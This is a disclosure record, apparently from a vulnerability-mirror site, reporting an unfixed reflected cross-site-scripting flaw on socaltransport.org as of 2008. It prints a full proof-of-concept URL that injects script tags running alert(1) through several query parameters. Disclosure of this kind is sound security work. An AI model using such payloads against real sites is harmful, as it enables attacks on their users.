Security researcher Azat Harutyunyan, has submitted on 29/05/2008 a cross-site-scripting (XSS) vulnerability affecting socaltransport.org, which at the time of submission ranked 29493 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 06/06/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 29/05/2008 |
Date published: 06/06/2008 |
Fixed? Mail us! | Status: UNFIXED |
Author: Azat Harutyunyan |
Domain: socaltransport.org |
Category: XSS |
Pagerank: 29493 |
URL: http://socaltransport.org/tm_pub_trips.php?name=trip&place0=%24place0&place1=%24place1&p0=%5C%22%3E% 3Cscript%3Ealert%281%29%3C%2Fscript%3E%3D%2F%2F%2F%2F&p1=%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscri pt%3E&landmark0=&landmark1=%2B%2B%2B%2B&m=AM&pname0=%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript %3E%3D%2F%2F%2F%2F&pname1=%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&day=Thu&timecrit=LV&min=2 3&our=08&hour=&mode=ANY&fare=RG&walk=1760&hcaccess=%24hcaccess&walking_distiance=&sort=&outputtype=& searchoptions=&distance=&sel=&auto=ON&function=get_itins&backambig=%2Fpub_trip.php%3Fimage_height%3D 288%26image_width%3D288%26href%3D%2527base_map_url%2527%26onclick%3Dwindow.parent.frames%255B1%255D. setmap%2528%2527base_map_url%2527%252C%2527qvimg1%2527%2529%253B%26number_of_columns%3D2%26output_ty pe%3Dmap%26pixels_per_foot%3D9.16666666666%26scale%3D4400%26data_layers%3Dall%26target%3Dright_ifram e%26debug_page%3Dtrue%26distiance_threashold%3D50%26mypaths%3D%2524mypaths%26place0%3D%2524place0%26 p0%3D%2524p0%26place1%3D%2524place1%26p1%3D%2524p1%26day%3D%2524day%26ampm%3D%2524ampm%26min%3D%2524 min%26our%3D%2524our%26timecrit%3D%2524timecrit%26fare%3D%2524fare%26walk%3D%2524walk%26hcaccess%3D% 2524hcaccess%26mode%3D%2524mode%26ovrte1%3D%2524ovrte1%26ovrte2%3D%2524ovrte2%26ovrte3%3D%2524ovrte3 %26ovrte4%3D%2524ovrte4%26p0%3D%2522%253E%253Cscript%253Ealert%281%29%253C%2Fscript%253E%3D%252b%252 b%252b%252b%26p1%3D%2522%253E%253Cscript%253Ealert%281%29%253C%2Fscript%253E%26landmark1%3D%252b%252 b%252b%252b%26timecrit%3DLV%26day%3DThu%26our%3D08%26min%3D23%26ampm%3DAM%26mode%3DANY%26fare%3DRG%2 6walk%3D1760&backtrips=&mypaths=%24mypaths&ovrte1=&ovrte2=&ovrte3=&ovrte1test=&ovrte2test=&ovrte3tes t=&image_width=288&image_height=288 |
Click here to view the mirror
|
|
|